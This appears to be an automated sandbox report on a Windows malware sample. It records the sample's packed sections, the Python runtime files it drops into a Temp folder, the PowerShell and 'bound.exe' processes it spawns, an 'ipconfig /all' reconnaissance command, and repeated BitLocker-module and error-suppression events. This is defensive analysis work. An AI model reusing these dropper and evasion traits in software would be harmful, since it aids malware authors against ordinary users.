                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Drawing.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499964052.00007FF8F8D81000.00000040.00000001.01000000.00000012.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498719679.00007FF8E8371000.00000040.00000001.01000000.0000000A.sdmp
                Source: Binary string: System.Numerics.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libssl-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.2.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.2.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.0.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.0.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E6C89060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8E6C89060
                Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
                Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
                Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
                Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
                Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
                Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: real checksum: 0x7e5fcb should be: 0x7e01b6
                Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
                Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
                Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
                Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
                Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
                Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
                Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
                Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
                Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
                Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E796AC25 push rcx; ret 2_2_00007FF8E796AC62
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A44331 push rcx; ret 2_2_00007FF8E7A44332
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88664D2A5 pushad ; iretd 11_2_00007FF88664D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88676861B push ebx; ret 11_2_00007FF88676862A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88676862B push ebx; ret 11_2_00007FF8867686CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF8868333EE pushfd ; iretd 11_2_00007FF8868333F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF886837A9C push esi; iretd 11_2_00007FF886837A9D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF886839266 push esi; iretd 11_2_00007FF886839267
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677D668 push ss; retf 17_2_00007FF88677D837
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677481F push esp; retf 17_2_00007FF886774821
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF886774829 push esp; retf 17_2_00007FF88677482A
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677A272 push ebx; retf 17_2_00007FF88677A282
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libcrypto-3.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libffi-8.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\sqlite3.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libssl-3.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\select.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exeJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pydJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD05830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7EAD05830
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
